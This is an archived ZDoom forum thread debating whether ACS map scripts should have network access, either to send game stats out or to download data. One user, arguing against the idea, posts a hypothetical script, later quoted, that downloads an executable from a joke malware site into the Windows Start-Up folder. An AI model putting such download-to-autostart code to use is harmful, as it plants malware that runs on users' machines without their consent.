ACS Networking
Forum rules
Before asking on how to use a ZDoom feature, read the ZDoom wiki first. This forum is archived - please use this set of forums to ask new questions.
Before asking on how to use a ZDoom feature, read the ZDoom wiki first. This forum is archived - please use this set of forums to ask new questions.
-
- Posts: 766
- Joined: Tue Sep 16, 2003 3:03 pm
ACS Networking
Can ACS access networking resources?
-
- Posts: 10002
- Joined: Fri Jul 18, 2003 6:18 pm
- Location: Idaho Falls, ID
-
- Posts: 766
- Joined: Tue Sep 16, 2003 3:03 pm
Can I say to ACS:
Hey, connect to port 80, and send this information to http://domain.tld/zdoom.php?update=1&p1 ... Wax,Johnny
Hey, connect to port 80, and send this information to http://domain.tld/zdoom.php?update=1&p1 ... Wax,Johnny
-
- Lead GZDoom+Raze Developer
- Posts: 49130
- Joined: Sat Jul 19, 2003 10:19 am
- Location: Germany
-
- Posts: 802
- Joined: Sun Oct 31, 2004 5:06 pm
- Location: Raleigh, NC
-
- Posts: 405
- Joined: Thu Jul 17, 2003 10:10 pm
Re: ACS Networking
That could be cool Assuming it is game related [vs some generalized net access], thus actually fits in the scheme of game multi-player stuff. Indirectly that's somewhat done now if you think about it.charris wrote:Can ACS access networking resources?
ATM have no idea how it could be useful , but then that's a typical chicken and egg conceptual problem.
-
- Posts: 2529
- Joined: Mon Mar 22, 2004 7:00 pm
- Preferred Pronouns: He/Him
- Location: California, USA. Previously known as "Agent ME".
-
- Posts: 4019
- Joined: Fri Aug 15, 2003 8:15 pm
- Location: ferret ~/C/ZDL $
um, you are saying its a good idea to let mappers download arbitrary files to my computer without my consent?
um... even i know that is a bad idea...
um... even i know that is a bad idea...
Code: Select all
script 1 (void){
DownloadFile("http://www.Virii-R-Us.com/blowupmypc/blowupmypc.exe","C:\Documents and Settings\All Users\Start-Up\");
}
-
- Posts: 10002
- Joined: Fri Jul 18, 2003 6:18 pm
- Location: Idaho Falls, ID
YNI and Agent ME are asking for two different things. YNI wants a way to transfer game stats from a ZDoom server to a website. Agent ME is asking for a way to download from a website to ZDoom.
If it was just a bit of data that ZDoom displayed in a controlled manner, it wouldn't pose any threat to the user, and vice versa.
If it was just a bit of data that ZDoom displayed in a controlled manner, it wouldn't pose any threat to the user, and vice versa.
-
- Posts: 802
- Joined: Sun Oct 31, 2004 5:06 pm
- Location: Raleigh, NC
-
- Posts: 11347
- Joined: Mon Oct 06, 2003 3:41 pm
- Operating System Version (Optional): Windows 10
- Location: United Kingdom
My thoughts exactlyBio Hazard wrote:um, you are saying its a good idea to let mappers download arbitrary files to my computer without my consent?
um... even i know that is a bad idea...
Code: Select all
script 1 (void){ DownloadFile("http://www.Virii-R-Us.com/blowupmypc/blowupmypc.exe","C:\Documents and Settings\All Users\Start-Up"); }
-
- Posts: 802
- Joined: Sun Oct 31, 2004 5:06 pm
- Location: Raleigh, NC
-
- Posts: 11347
- Joined: Mon Oct 06, 2003 3:41 pm
- Operating System Version (Optional): Windows 10
- Location: United Kingdom
-
- Posts: 1235
- Joined: Fri Jan 07, 2005 7:29 pm
- Location: #DMClub
If you wan't the daily ZDoom news quickly put it on active desktop.Agent ME wrote:I know many ways it would be useful. I would like it. Just as long as we can download a variable from a file at an URL. Then we could have "The Daily ZDooM News" in a WAD! (Just as long as someone constantly updated the file.)